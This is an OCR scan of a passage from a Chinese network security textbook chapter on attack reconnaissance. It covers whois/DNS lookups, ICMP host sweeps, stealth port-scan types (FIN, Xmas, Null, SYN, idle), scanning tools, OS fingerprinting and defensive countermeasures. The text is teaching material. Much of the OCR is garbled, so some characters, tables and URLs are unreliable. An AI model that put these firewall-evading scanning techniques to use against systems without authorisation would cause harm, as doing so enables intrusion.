$55 恶意 代码 攻击 机 理 分 析 
第 6 章 口令 攻击 

第 7 章 ”欺骗 攻击 

第 8 章 缓冲 区 溢出 攻击 与 防范 
第 9 章 ”拒绝 服务 攻击 与 防范 
#108 SQL 注入 攻击 与 防范 


网 络 攻 击 扫描 原理 与 防范 。 第 4 章 


4.1 概述 


4.1.1 目标 扫描 理念 


目标 扫 摘 是 攻击 者 必 备 的 过 程 ,是 攻击 省 确定 攻击 手段 的 前 提 。 对 一 
个 有 经 验 的 黑客 来 说 ,关于 攻击 目标 的 任何 知识 都 可 能 市 来 新 的 攻击 血 
机 ,如 操作 系统 类 型 ,应 用 程序 版 本 .系统 提供 的 服务 .系统 用 户 名 称 、 用 户 
手机 号 但 .邮件 账号 等 。 攻 击 者 可 通过 扫 拉 获得 的 信息 分 析 系 统 是 否 存在 


4.1.2 目标 扫描 过 程 


目标 扫 摘 过 程 通 第 来 说 是 一 个 循序 渐进 、 不 断 深 入 挖 据 信 息 和 综合 利用 
Witte. 。 随 着 信息 积累 ,攻击 肴 逐步 匀 男 出 一 个 具体 可 攻击 的 目标 。 假 定 普 
客 攻 击 茶 集团 公司 的 信息 网 络 系统 , 则 秋 客 以 茶 集 团 公 司 为 核心 关键 提示 信 
E, ,逐步 展开 关于 革 集 团 公司 的 网 络 攻击 信息 收集 和 整理 ,逐渐 形成 一 个 天 
于 攻击 某 集团 公司 的 网 络 信息 地 形 图 ,这 些 信 息 主 要 包括 主机 OS 类 型 .IP 
地 址 分 布 \. 网 络 拓扑 结构 、 核 心 业务 服 务 带 、 攻 击 切 和 人 点、 安全 漏洞 与 分 布 状 
况 .安全 措施 。 然 后 根据 这 些 信 息 ,攻击 者 可 制订 一 个 具体 的 攻击 方案 。 


4.1.3 目标 扫描 类 型 


根据 黑客 的 攻击 目标 ,大 体 上 可 以 将 目标 扫 摘 分 成 两 大 类 。 

第 一 大 类 是 目标 中 的 宏观 信息 。 例 如 , 茶 个 行业 信息 化 中 的 操作 系统 类 
型 数据库 类 型 .应 用 平台 类 型 行业 信息 网 络 结构 、IP 地 址 的 分 布 、 行 业 安全 
机 制 \ 行 业 中 安全 措施 部 团 、 行 业 用 户 行 为 习惯 和 安全 系 质 行业 信息 产品 供 
应 商 。 根 据 这 些 宏观 目标 信息 ,攻击 者 可 以 针对 过 个 行业 ,开发 特定 的 攻击 
程序 ,以 实现 精确 的 网 络 目标 攻击 ,或 着 实现 大 规模 的 攻击 。 
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第 二 大 类 是 微观 目标 信息 。 相 对 安 观 目标 信息 而 言 ,微观 目标 信息 就 是 具体 攻击 对 委 
所 具有 的 一 些 信息 ,典型 的 信息 包括 操作 系统 版 本 号 、 数 据 库 版 本 号 、 开 放 的 网 络 端口 、 用 户 
列表 、 系 统 当 前 补丁 、 安 全 设置 .应 用 服务 类 型 软件 包 源 洞 等 。 


4.1.4 目标 扫 朱 途径 


攻击 者 信息 搜集 有 两 条 主要 途径 : 一 条 途径 就 是 通过 互联 网 ,利用 网 络 在 线 主动 收集 
攻击 目标 信息 ; 另 一 途径 就 是 利用 非 在 线 的 形式 来 收集 攻击 目标 信息 ,一 般 称 为 传统 的 广 
式 ,如 报纸 ,杂志 、 合 作 伙伴 提供 方案 等 。 通 过 厂商 的 应 用 案例 介绍 可 以 获取 用 户 的 网 络 设 
备 部 署 资料 。 


4.2 人 稍 定 攻击 目标 方法 与 工具 


1. 利用 万 维 网 站 点 列表 

现在 一 些 网 站 提供 万 维 网 资源 目录 服务 ,攻击 者 可 以 通过 该 资源 网 站 快速 地 知道 攻击 
目标 信息 。 典 型 WWW 资源 目录 有 大 学 万 维 网 地 址 、 新 闻 媒 体 万 维 网 地 址 、 某 行业 万 维 网 
地 址 政府 网 站 等 。 

攻击 者 分 析 这 些 万 维 网 网 址 ,根据 攻击 意图 将 其 列 人 被 攻击 对 象 ,或 者 通过 万 维 网 络 地 
址 可 以 次 入 挖掘 出 目标 网 络 的 域名 TP 地 址 范围 .边界 路 巾 硕 设备 .电子 邮件 服务 硕 等 。 事 
实 上 ,万 维 网 本 号 就 是 一 个 “网 ”, 网 页 上 每 个 链接 都 与 其 他 节点 链接 ,攻击 者 从 一 个 站 点 出 
发 ,总 能 够 挖掘 出 一 大 批 相关 站 上 点。 攻击 者 可 通过 使 用 讨 虫 工具 扩大 信息 收集 范围 。 

2. 利用 搜索 引擎 

搜索 引擎 成 为 当前 了 解 互 联网 信息 的 重要 窗口 。 需 要 什么 信息 ,只 要 在 查询 框 里 输入 
JL BEF ,就 可 以 找 出 大 量 与 之 相关 的 站 点 和 网 页 。 

目前 ,Google 已 经 成 为 黑客 重要 文 持 工具 之 一 。 通 过 Google 搜索 ,黑客 可 以 获取 大 量 


3. 利用 whois 确定 攻击 目标 

InterNIC(Internet Information Center) 是 能 够 提供 在 Internet. 上 的 用 户 和 主机 信息 的 
一 个 机 构 。 问 InterNIC 注册 可 以 使 Internet 上 的 任何 一 个 用 户 知 道 你 (的 主机 )。whois 是 
一 个 客户 程序 , 它 与 InterNIC( 域 名 为 whois. internic. net) 联 系 ,查询 相应 信息 并 返回 。 也 
可 以 使 用 WWW 方式 ,InterNIC HY Web MLA http://www. internic. net, f£ InterNIC 的 
whois search rfj A “GOOGLE. COM” ,得 到 的 信息 如 下 。 


Domain Name: GOOGLE. COM 

Registrar: EMARKMONITOR INC. DBA MARKMONITOR 
Whois Server: whois.markmonitor. com 
Referral URL: http://www. markmonitor. com 
Name Server: NS2.GOOGLE. COM 

Name Server: NS1.GOOGLE. COM 
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Name Server: NS3. GOOGLE. COM 

Name Server: NS4. GOOGLE. COM 
Status: clientTransferProhibited 
Status: clientUpdateProhibited 
Status: clientDeleteProhibited 
Updated Date: 10 — apr - 2006 
Creation Date: 15 — sep - 1997 
Expiration Date: 14 — sep - 2011 


使 用 此 域名 可 以 查看 到 该 域名 天 于 注册 的 相关 信息 ,甚至 注册 者 的 邮箱 信息 都 可 以 使 
用 whois 工具 获取 。whois 工具 第 第 配合 社会 工程 学 攻击 方式 一 起 使 用 ，。 

4. 利用 DNS 确定 攻击 目标 

DNS( Domain Name Service) 提 供 IP 地 址 和 域名 解析 服务 ,除了 域名 与 IP 地 址 的 对 应 
以 外 ,DNS 服务 解析 数据 中 还 包含 其 他 信息 ,如 主机 类 型 一 个 域 中 的 邮件 服务 器 地 址 、 邮 
件 转发 信息 等 。 通 过 使 用 nslookup 命令 ,攻击 者 可 以 直接 查询 到 某 组 织 中 的 DNS 信息 。 
例如 ,利用 nslookup 命令 获取 Google 公司 的 www. google. com AY IP 地 址 信息 ,查询 结果 
如 图 4-1 所 示 。 


ex C:VWIRDORS \system3?7\cad. exe 一 nslookup 


D:\ons lookup 
Default Server:  isdn.iscas.ac.cn 
fiddress: 159.226.5.65 


> www.google.com 
Server: isdn.iscas.ac.cn 
Address: 159.226.5.65 


Non-authoritative answer: 
Name : www-china.1l.google.com 
Address: 64.233.189 .164 


Aliases: www.google.com, www.1.qgoogle.com 


> 





4-1 nslookup 查询 信息 示意 图 


另外 ,nslookup 中 的 1s 命令 ,还 可 以 通过 利用 DNS 服务 天 的 zone 传输 功能 ,获取 域名 
的 整体 信息 。 
5. 利用 网 段 扫描 


攻击 者 已 经 知 掉 某 个 组 织 的 IP 地 址 分 配 范 于 ,但 不 清楚 该 网 段 上 有 哪些 具体 的 主机 在 
oo [有 具 获得 该 网 段 上 的 所 有 活动 主机 。 典 型 本 具有 ping, nmap, 
QuickPing 等 。 这 里 以 QuickPing 为 例 ,运行 QuickPing, 即 可 快速 获取 该 网 段 上 所 有 活动 
主机 的 IP 地 址 ,运行 结果 如 图 4-2 所 示 。 
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#224: 17:32:55 终止 ， 17:33; 3:24 用 时 ; 0:00:28 “响应 数 ， 6 
开始 | 停止 | B C RE ER TET | 关闭 | 


4-2. QuickPing 获取 在 线 主机 示意 图 


4.3 PLATA 


主机 扫描 是 指 为 了 确定 在 目标 网 络 上 任意 的 主机 是 否 可 达 。 主 机 扫描 是 信息 收集 的 初 
级 阶段 ,其 效果 直接 影响 到 后 续 的 扫描 。 

1. 传统 技术 

常用 的 传统 扫描 手段 有 ICMP Echo 扫描 和 Broadcast ICMP 扫描 。 

1) ICMP Echo 扫描 

实现 原理 : ping 的 实现 机 制 , 有 利于 判断 在 网 络 上 的 某 一 主机 是 否 开 机 。 向 目标 主机 
发 送 type 8 HY ICMP Echo Request 数据 包 , 然 后 等 竺 回复。 如 果 能 收 到 type 0 Hj ICMP 
Echo Reply 包 , 则 表明 目标 系统 可 达 ,否则 不 可 达 或 发 送 的 包 已 被 对 方 过 滤 。 

使 用 ICMP Echo 的 方式 实现 主机 扫 摘 简单 易 行 , 且 多 系统 文 持 这 种 扫 拉 方式。 缺点 在 
F ICMP Echo 扫 摘 很 容易 被 防火 墙 限 制 。 在 实际 应 用 场景 中 ,为 了 提高 探测 效率 ,可 以 并 
行 发 送 数 据 包 ,同时 探测 多 个 目标 主机 ( 即 ICMP Sweep 扫描 ) 。 

2) Broadcast ICMP 扫描 

实现 原理 : 把 ICMP 请 求 包 的 目标 地 址 设置 为 网 络 地 址 来 探测 整个 网 络 , 同 样 也 可 以 
把 ICMP 请 求 包 的 目标 地 址 设置 为 广播 地 址 ,来 探测 广播 域 范 围 内 的 主机 。 

Broadcast ICMP 扫 摘 ,不 适合 Windows 系统 ,因为 它 会 将 请 求 包 忽略 ,然而 UNIX/ 
Linux 系统 则 不 然 ,所 以 这 种 扫描 方式 易 引 发 广播 风 骏 。 

2. 高 级 技术 

防火 墙 和 网 络 过 滤 设 备 ,对 传统 的 探测 手段 产生 了 一 定 阻 碍 。 为 消除 障碍 ,需要 使 
用 特别 的 处 理 方式 。ICMP 协议 提供 的 网 络 间 传送 错误 信息 的 方式 ,可 以 更 好 地 实现 
目的 。 
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CD 异常 的 IP Ek., I8] HPEH XS f£ Te BREAN IP CHA hie ine EH 
Header Length Field 和 IP Options Field) ,目标 主机 及 过 滤 设 备 则 会 反馈 错误 信息 (ICMP 
Parameter Problem Error)。 根 据 RFC1122 的 规定 ,IP 包 的 VersionNumber、Checksum ^£ 
段 由 主机 检测 ,IP 包 的 Checksum 字段 则 由 路 由 剖 检 测 。 人 返回 的 结 来 会 因 路 由 盖 和 系统 对 
这 些 错误 米 用 不 同 的 处 理 方 式 而 不 尽 相 同 。 青 综合 其 他 手段 , 则 可 以 将 目标 系统 所 在 网 络 
范围 内 的 过 滤 设 备 的 访问 控制 列表 初步 判断 出 来 。 

(2) 在 IP 头 中 设置 无 效 的 字段 值 。 回 目标 主机 发 送 填充 了 错误 字段 值 的 IP 包 ,目标 
主机 及 过 滤 设 备 会 反馈 错误 信息 (ICMP Destination Unreachable) 。 此 外 ,还 可 以 用 该 方法 
来 探测 目标 主机 和 网 络 设备 以 及 其 访问 控制 列表 。 

(3) 销 误 的 效 据 分 片 。 当 目标 主机 接收 到 错误 的 或 丢失 的 数据 分 请, 并 且 在 规定 的 时 
轩 间 隔 内 得 不 到 更 正 时 ,这 些 错误 数据 包 将 会 锌 于 和 痉 , 并 回 发 送 主机 反馈 销 误 报 文 。 目 标 主 
机 和 网 络 过 滤 设 备 及 其 ACL 也 可 以 用 这 种 方法 检测 到 。 

(4) 通过 超 长 包 探 测 内 部 路 由 冀 。 硅 构造 的 数据 包 长 度 超过 路 由 各 的 最 大 路 径 传 输 单 
元 ,并 且 设 置 了 和 茶 止 分 片 标 志 ，, 该 路 由 融会 反馈 差 钳 报 文 , 从 而 获取 网 络 折 扑 结构 。 

(5) 反 回 映射 探测 。 利 用 该 技术 可 以 探测 被 过 涯 的 设备 ,以 及 被 防火 场 保 护 的 网 络 及 
EHL. 

编程 人 员 可 以 构造 可 能 的 内 部 IP 地 址 列表 ,并 回 这 些 地 址 发 送 数据 包 , 以 此 来 探测 某 
个 未 知 网 络 内 部 的 结构 。 对 方 路 由 冀 在 接收 到 这 些 数 据 包 时 ,会 进行 IP 识别 ,对 不 在 其 服 
务 范围 的 IP 包 发 送 错误 报 文 (ICMP Host Unreachable 或 ICMP Time Exceeded) ,而 那些 
没有 接收 到 相应 错误 报 文 的 IP 地 址 , 则 会 被 认为 在 该 网 络 中 。 当 然 , 这 种 方法 不 能 完全 排 
除 会 存在 过 滤 设 备 的 影响 。 


4.4 端口 扫描 技术 


4.4.1 端口 扫 拉 原理 与 类 型 


一 个 碧 口 就 是 一 台 计 算 机 对 外 提供 服务 的 窗口 ,但 也 是 一 个 潜在 的 入 侵 通 道 。 端 口 扫 
摘 根 据 远 程 主机 的 端口 不 同 从 而 选用 发 送 特 定 的 请 求 信息 ,之 后 根据 远程 主机 的 不 同 反 人 馈 
信息 ,来 确定 远程 主机 的 端口 是 否 处 于 开局 状态 。 通 过 这 种 方法 ,攻击 者 可 以 搜集 到 关 
于 目标 主机 上 开放 了 的 奖 口 .运行 了 的 服务 等 有 用 的 服务 信息 ,这 些 都 是 人 侵 系 统 的 可 
能 途径 。 

例如 ,通过 扫描 发 现 某 主机 开启 139 端口 ,就 可 以 推断 该 主机 提供 共享 服务 ,然后 再 进 
一 步 分 析 该 服务 是 否 有 漏洞 ,如 果 有 漏洞 , 则 黑客 怠 会 利用 139 端口 进入 到 目标 主机 ,如 
图 4-3 所 示 。 

当 确 认 了 目标 主机 可 达 后 ,就 可 以 使 用 端口 扫描 技术 ,以 此 来 探测 发 现 目 标 主 机 上 的 关 
于 网 络 协议 及 其 他 应 用 监听 的 开放 端口 等 。 端 口 扫 摘 技术 主要 包括 开放 扫 撒 、 隐 蔽 扫 摘 、 半 


S reotlteztT4: 


4 ~]# nmap 192.168.3.12 


Starting nmap 3.70 ( http://www.lnsecure.org/nmap/ ) at 2007-05-11 15:02 UTC 
Interesting pc rte on 192.168.3.12: 
(The 1656 ports £ cannad but not shown below are in state: closed) 

STATE SERVICE 

open msrpc 

open DO sn 

open mic oft-ds 


! /tcp open NFS-or- IIS 
MAC Address: 00:11:11:53D:18:37 (Intel) 


Nma ap run boy abu l IP address (1 host up) scanned in 11.7 


EY 





4-3 fm E 


4.4.2 开放 扫描 


开放 扫 摘 会 产生 很 多 的 审计 数据 ,虽然 可 徘 性 好 ,但 很 容易 被 发 现 。 

1. TCP Connect 扫描 

实现 原理 : 通过 调用 图 数 connect() 连 接 到 目标 计算 机 上 SÉ — RRP. Xr 
状 仿 处 于 侦 听 状态 ,那么 connect() 就 能 成 功 返 回 。 反 之 则 不 可 用 。 

优点 : Eur DE ,无 须 特殊 的 权限 . 

缺点 : 扫 质 方式 不 太 隐 蔽 ,容易 被 防火 墙 屏 蔽 ,并 且 连 接 和 错误 记录 会 被 服务 硕 日 志 
iix. 

2. TCP 反 向 ident 扫描 

实现 原理 : ident 协议 中 ,通过 TCP 连接 的 任何 进程 的 拥有 者 的 用 户 名 都 允许 被 看 到 , 即 
使 这 个 连接 并 不 是 由 这 个 进程 开始 的 。 一 旦 连接 被 建立 ,TCP 连接 的 查询 数据 可 以 被 ident Hk 
务 读 取 。 例 如 ,连接 到 http 9m O SAI AA ident 来 发 现 服务 硕 是 否 正在 以 root 权限 运行 。 

缺点 : 只 有 一 个 完整 的 TCP 连接 在 和 目标 端口 建立 后 才能 看 到 。 


4.4.3 隐蔽 扫描 

隐蔽 扫描 可 以 躲 过 人 侵 系 统 检测 和 防火 墙 检测 ,但 在 通过 网 络 时 易 让 用 到 的 数据 包 被 
EF MEER MA EIR. 

1. TCP FIN EAH 

在 TCP 层 , 有 个 FLAGS 字 段 ,这 个 字段 标识 有 SYN.FINT,ACK,PSH,RST,URG, 


FINT 表示 关闭 连接 ,RST ORB REA. JRE Th ae el A ps EL ig A AIK FIN 包 。 
i A ty EL vig A ee RAY WU KE SHE IF AK Il — A RST Mee. 690 . ds fu EE 
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弃 却 不 返回 RST. TCP FIN 扫描 示意 图 如 4-4 所 示 。 

优点 : 标准 的 TCP 三 次 握手 协议 由 于 并 不 包含 这 种 技术 ,因此 不 能 被 记录 下 来 ,进而 
比 SYN 扫描 隐蔽 性 更 强 。 包 过 滤器 只 监测 SYN 包 , 所 以 FIN 数据 包 可 以 通过 。 

缺点 : 类 似 于 SYN 扫描 ,数据 包 需 要 自己 构造 ,专门 的 系统 调用 要 求 由 授权 用 户 或 超 
级 用 户 来 访问 ; 一 般 适 用 于 UNIX 目标 主机 ,因为 少量 操作 系统 应 当 于 弃 数 据 包 却 发 送 
RST 包 , 这 样 的 系统 包括 CISCO、HP/UX、MVS 和 IRIX。 但 在 Windows 95/NT 环境 下 ， 
因为 无 论 目 标 端 口 打 开 与 否 , 操 作 系 统 都 会 返回 RST 包 , 所 以 该 方法 无 效 。 

2. TCP ACK 扫描 

TCP ACK 扫描 是 秘密 扫描 的 一 种 : 每 次 接口 变换 ,数据 包 的 TTL 将 会 自 减 1 (Linux) ; 
ACK 的 回复 包 中 如 果 windows>0 F im O , 当 数 据 包 被 接收 并 检查 时 ,ITIL 将 会 减 1. 
如 果 发 送 包 的 标志 不 是 SYN ,将 返回 一 个 RST 包 ,并 且 这 个 包 的 TTL 比 扫 描 关闭 端口 得 
到 的 RST 返回 包 的 TTL fav) 1. TCP ACK 扫描 示意 图 如 4-5 所 示 。 


客户 机 目标 机 az Pul 目标 机 





Nothing 


TIRA FEN EAE [u] ed TTL 小 于 接收 到 的 关闭 端口 


RST 包 中 的 TTL 
(Linux: TTL «64)uv Windows>0 
>0 


图 4-4 TCP FIN 扫描 示意 图 图 4-5 TCP ACK 扫描 示意 图 


3. TCP Xmas 扫描 和 TCP Null 扫描 

TCP Xmas 和 TCP Null 扫描 是 由 FINT 扫描 变化 而 来 的 。Xmas 扫描 打开 FINT, 
URG 和 PUSH 标记 ,而 Null 扫描 关闭 所 有 的 标记 。 这 些 之 所 以 组 合 在 一 起 ,是 为 了 通过 
对 FINT 标记 数据 包 的 过 滤 。 当 一 个 这 种 数据 包 到 达 一 个 关闭 的 端口 时 ,数据 包 会 被 于 弃 ， 
并 且 返 回 一 个 RST 数据 包 。 否 则 ,数据 包 只 是 被 于 莽 而 不 返回 RST. 

优点 : 隐蔽 性 好 。 

缺点 : 需要 目 己 构造 数据 包 ,并 且 要 求 有 超级 用 户 或 授权 用 户 权 限 。 

TCP Xmas H}. TCP Null 扫描 通常 适用 于 UNIX 目标 主机 ,而 不 适用 于 Windows 系统 。 

4. 分 段 扫 描 

实现 原理 ; 不 将 TCP 探测 数据 包 直 接 发 送 , 而 是 使 数据 包 和 被 分 成 两 个 较 小 的 JIP E. 
一 个 TCP 头 被 分 成 好 几 个 数据 包 , 包 过 滤 兹 就 不 容 匈 探测 到 ， 

优点 : 隐 税 性 好 ,可 罕 防 火 填 。 

缺点 : 可 能 外 Q 于 弃 , 某 些 程序 在 处 理 这 些小 数据 包 时 会 出 现 异 第。 


4.4.4 半 开 放 扫 摘 
半 开 放 扫 描 法 的 隐蔽 性 及 可 靠 性 介 于 开放 扫描 法 与 隐蔽 扫描 法 之 间 。 


60 
而 络 攻 防 原 理 及 应 用 


1. TCP SYN 扫描 

实现 原理 : 扫描 器 向 目标 主机 端口 发 送 SYN 包 , 若 目标 主机 端口 是 关闭 的 ,应 答 是 
RST £2; 右 目 标 问 口 处 于 监听 状态 , 则 应 答 中 包含 SYN 和 ACK 包 , 再 传送 一 个 RST fu 
目标 主机 从 而 使 建立 连接 停止 。 由 于 在 SYN 扫描 时 ,尚未 建立 全 连接 ,因此 通常 把 这 种 技 
术 称 为 半 连 接 扫 摘 。 

优点 : 比 全 连接 扫 摘 隐蔽 ,这 种 半 扫 摘 在 一 般 系 统 中 很 少 被 记录 。 

缺点 : 通常 需要 超级 用 户 或 授权 用 户 访 问 专 门 的 系统 调用 来 构造 SYN 数据 包 。 

2. TCP 间接 扫描 

实现 原理 : FOE ERAI B9 IP 会 利用 第 三 方 的 IP( 欺 骗 主 机 ) 来 隐藏 。 由 于 被 扫描 主机 
会 对 欺骗 主机 发 送 反 人 馈 信 息 , 因 此 必须 监控 欺骗 主机 的 IP 行为 来 获得 厚 始 扫描 的 结果 。 扫 
描 主 机 在 伪造 第 三 方 主机 IP 地 址 的 前 提 下 ,对 目标 主机 发 起 SYN 扫描 ,然后 进行 IP 序列 
号 的 增 人 规律 的 观察 ， 进而 获取 交口 状态 。 

缺点 : 对 第 三 方 主机 的 要 求 较 高 。 


4.4.5 端口 扫描 工具 


ee dt 而 扫描 工具 不 仅 是 网 络 攻击 的 工具 ,也 是 网 络 安 全 维护 的 工 
具 。 通 过 使 用 扫描 工具 ,安全 从 业 人 员 可 快速 地 定位 到 网 络 中 的 脆弱 点 。 常 用 的 扫描 工具 
有 很 多 , 表 4-1 SH T A Wis H1 34358 1.7 4H 8 28 , 


X 4-1. 常见 的 端口 扫描 工具 及 扫描 类 型 


^ ftp://ftp. FreeBSD. . org/pub/FreeBSD/ ports/ 
distfiles/strobe-1. 06. tgz 


O5 | m |http: / / wwwdsilx. wwdsi. com/ saint 
http: //wwwdsilx. wwdsi. com/saint 
http://www. insecure. org/nmap 
http://www. lOpht. com/users/10pht/ncl10tgz 
http://www. 10pht. com/users/10pht/ncel10tgz 


扫描 程序 


UNIX 


NetScanTools 
Pro 2000 


Windows 


f http;//www.nwpsw.com 





http: //members. home. com/rkeir/software. html 
http://www. ntobjectives. com 

http://www. prosolve. com 

http: //ntsecurity. nu 

http: //ntsecurity. nu 

http://www. foundstone. com 


(1) Strobe: 超级 优化 TCP im O fy UM EE. ES TCP vig A tiaro BER TS EOL am AY 
所 有 开放 端口 记录 下 来 ,快速 识别 哪些 正在 服务 指定 主机 上 运行 ,提示 能 被 攻击 的 服务 。 
(2) Udp scan; 执行 UDP 扫 摘 ,可 以 记录 目标 主机 所 有 开放 的 关口 和 服务 。 
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(3) NetBrute: 扫 摘 一 个 连续 网 段 的 特定 端口 。 寻 找 特 定 主机 或 特定 服务 常用 这 种 工 
具 , 如 Web IRS ar; 检测 木马 也 可 以 用 这 种 工具 ,如 检测 7626 端口 用 来 检测 冰河 。 

(4) SuperScan: 针对 一 人 台 特 定 的 服务 融 扫 描 所 有 端口 。 这 种 工具 篆 用 来 攻击 一 侣 特定 
主机 ,来 搜集 此 主机 的 大 致 信息 ,最 后 确定 攻击 方案 。 

(5) Nmap: 一 种 流行 的 扫 摘 工具 ,人 允许 系统 管理 员 查 看 一 个 网 络 系统 存在 的 所 有 主机 
和 主机 上 运行 的 服务 ,可 以 支持 多 协议 扫描 ,如 UDP, TCP connect()、TCP SYN, ftp 
proxy, Reverse-ident, ICMP, FIN, ACK sweep, Xmas Tree, SYN sweep 和 Null 4 fifi. 
Nmap 还 提供 通过 TCP/IP 协议 来 鉴别 操作 系统 类 型 .秘密 扫描 、 平 行 扫 摘 .欺骗 扫 摘 、 分 布 
Ai, Hii RPC 扫描 ,动态 延迟 和 重 发 .通过 并 行 的 ping 侦 测 下 属 的 主机 、 端 口 过 滤 探 
il 灵活 的 目标 选择 ,以 及 端口 的 描述 这 些 实用 功能 。 


Hel HDL AN 


漏洞 扫 摘 技术 是 在 端口 扫描 技术 的 基础 上 进行 的 。 关 于 漏洞 标准 及 挖掘 等 知识 可 查看 
第 3 曹 内 容 。 在 对 网 络 进 行人 侵 时 要 通过 利用 当前 系统 已 存在 的 漏洞 进行 渗透 , 信 此 达到 
入 侵 系 统 、 获 取 人 敏感 信息 、 实 施 破坏 行为 的 目标 。 

漏洞 扫 摘 通 稼 通过 以 下 两 种 方法 来 检查 目标 主机 是 否 存 在 漏洞 。 

CD 漏洞 库 的 匹配 方法 : 是 指 得 知 经 过 端口 扫描 后 的 目标 主机 开启 端口 及 端口 上 的 网 
络 服务 ,将 这 些 信息 与 网 络 漏洞 扫 摘 系统 提供 的 乌 洞 库 进 行 匹配 ,查看 是 否 存 在 满足 匹配 条 
件 的 漏洞 。 

(2) 插件 技术 , 即 功能 模块 拉 术 。 对 黑客 的 攻击 手法 进行 模拟 ,对 目标 主机 系统 进行 攻 
击 性 的 安全 漏洞 扫描 ,如 测试 弱势 口 令 等 。 昔 模拟 攻击 成 功 , 则 表明 此 类 安全 漏洞 在 目标 主 
机 系统 中 存在 。 


4.6 操作 系统 兴 型 信息 获取 方法 与 工具 


1. 利用 应 用 程序 远程 识别 操作 系统 
通常 来 说 ,应 用 程序 服务 会 在 操作 系统 中 运行 ,并 且 该 操作 系统 类 型 会 在 服务 显示 。 例 
如 ,telnet 到 一 台 主 机 , 则 会 显示 该 主机 的 版 本 信息 ,如 下 所 示 。 





$ telnet numen. com 
Trying 192.168.0.111... 
Connected to numen. com. 
Escape character is '^]'. 
SunOS 5.7 

login: 


通过 这 些 信 息 , 可 以 获知 目标 系统 运行 的 是 SunOS 5. 7. Bf Solaris 2. 7. f H] Sun 
Microsystem 公司 的 操作 系统 。 
除了 利用 telnet 应 用 服务 外 ,还 可 以 用 FTP、SMTP、WWW 等 应 用 服务 来 获取 目标 主 
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机 的 操作 系统 类 型 。 
2. 利用 端口 扫描 识别 操作 系统 
利用 端口 扫描 ,还 可 以 大 概 判 断 目标 主机 的 操作 系统 类 型 。 表 4-2 所 示 为 操作 系统 类 
型 与 端口 开放 对 照 表 ,例如 ,UNIX 系统 不 开放 139 端口 服务 ,如 果 某 目标 主机 提供 139 端 
口服 务 , 则 该 主机 的 操作 系统 很 可 能 是 Windows 操作 系统 。 
R42 ”操作 系统 类 型 与 端口 开放 对 照 






a a 5 
uie | 8$ | 5 | "w& | 是 | BH 
Windows 95/98 [os | * | # | * s 


3. 利用 TCP/IP 协议 堆栈 特性 远程 识别 操作 系统 

RFC 文档 (Request For Comment) Æ A fi] HEF AAJ TCP/IP 协议 堆栈 的 实现 依据 ， 
所 有 按照 标准 实现 的 协议 实例 的 表现 在 绝 大 多 数 情 形 部 是 相同 的 。 但 是 ,由 于 RFC 文档 对 
一 些 拷 术 细 方 示 定义 ,因此 各 公司 OS 实现 就 有 差异 ,而 这 种 差异 就 可 以 区 别 不 同 的 操作 系 
统 类 型 。 目 前 ,这 项 新 技术 已 经 被 扫描 集成 应 用 ,如 checkos、Queso、nmap 等 工具 中 就 利用 
了 这 一 技术 。 


4.7 ”有 防 汇 攻 击 信息 收 集 方法 与 工具 


1. 修改 banner 信息 

为 了 防止 攻击 者 真实 和 擎 握 保护 系统 的 敏感 信息 ,安全 管理 员 应 修改 服务 程序 的 标志 依 
E (banner) ,如 操作 系统 版 本 信息 、 网 站 软件 版 本 等 。 这 些 信 息 不 泄露 给 攻击 者 ,就 在 一 定 
程度 上 增加 攻击 者 难度 。 下 面 是 某 主 机 中 Telnet 显示 信息 ,就 是 一 个 安全 做 得 好 的 实例 ， 
该 系统 的 Telnet 不 提供 关于 操作 系统 的 任何 有 用 信息 。 


$ telnet virtual.com 

Connecting to host virtual. com...Connected 
Welcome to Virtual World! 

Unauthorized computer usage is illegal! 


2. 关闭 潜在 危害 服务 

攻击 者 之 所 以 成 功 和 人 侵 到 信息 网 络 系 统 , 训 是 综合 利用 了 系统 的 危害 服务 。 攻 击 者 忆 
是 设法 发 现 系统 的 危害 服务 ,以 期 找到 攻击 入 口 点 ,形成 一 条 攻击 链 。 

因此 ,关闭 危害 服务 不 仅 可 以 切断 攻击 痢 的 攻击 链 , 而 且 也 能 阻止 攻击 者 收集 到 目标 系 
统 的 信息 ,从 而 达到 积极 的 防范 效果 。 上 典型 需要 关闭 的 服务 有 文件 共享 、NIS、 BOOTP, 
finger.NTP、echo、discard、chargen、CDP 等 网 络 服务 ,使 用 这 些 服 务 会 在 一 定 程 度 上 给 依 
县 网 络 造成 安全 隐患 ,为 了 安全 ,建议 关闭 这 些 服务 。 
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3. 限制 使 用 端口 

病 口 的 访问 控制 是 增强 网 络 信息 安全 最 为 有 效 的 手段 之 一 ,针对 闯 口 扫 摘 ,安全 管理 员 
在 网 络 边界 处 设置 过 滤 希 ,禁止 恶意 的 网 络 包 通行 ,或 者 只 人 允许 指定 的 通信 问 口 通行 。 端 口 
的 访问 控制 典型 技术 手段 有 利用 路 由 大 过 滤 、 利用 NATI 屏蔽 网 络 内 部 机 构 、 利 用 防火 均 阻 
止 扫 摘 行为、 指定 应 用 服务 访问 IP 地 址 或 域名 。 

4. 服务 配置 安全 增强 

安全 配置 增强 是 指 通过 一 些 安全 配置 修改 来 提高 网 络 信息 系统 的 安全 防护 能 力 。 目 
前 ,安全 配置 增强 方法 常见 的 有 以 下 几 种 。 

C1) 停止 服务 和 凶 载 软件 。 

(2) 升级 或 更 换 程 序 。 在 很 多 的 情况 下 ,解决 问题 的 办 法 就 是 升级 软件 。 如 果 仍 不 能 
解决 , 则 要 考虑 更 换 程 序 。 

(3) 修改 配置 或 权限 。 建 议 用 户 根 据 实际 情况 和 审计 结果 ,对 配置 或 权限 设置 问题 进 
ÍTEM. 

(4) 安装 专用 的 安全 工具 软件 。 例 如 ,用 户 可 以 安装 有 目 动 补丁 管理 程序 、 杀 毒 软件 ,个 
AB Js. 

(5) 安全 漏洞 打 补 丁 。 以 第 见 的 Windows 系统 配置 安全 增强 来 说 ,需要 做 以 下 几 个 配 
置 实现 安全 增强 的 目的 。 

(D 关闭 空 会 话 连接 。 

Q A IESUGA dE, 

O fF Guest 账号 。 

(D 系统 Administrator 账号 改名 。 

O 给 用 户 设置 安全 口令 。 

© 启用 端口 过 滤 机 制 ,限制 访问 。 

5. 强化 信息 安全 管理 

信息 管理 是 一 个 组 织 常 党 容易 忽视 的 地 方 , 一 些 攻 击 者 开始 转 问 社会 工程 方法 来 攻击 
内 部 网 络 系统 。 攻 击 者 利用 组 织 中 管理 混乱 ,获取 有 价值 的 信息 。 典 型 信息 如 网 络 拓扑 机 
构 网络 设备 名 称 和 类 型 .应 用 服务 部 署 情 况 LIP 地 址 分 配 \、 安 全 设备 部 署 情况 等 。 日 前 , 信 
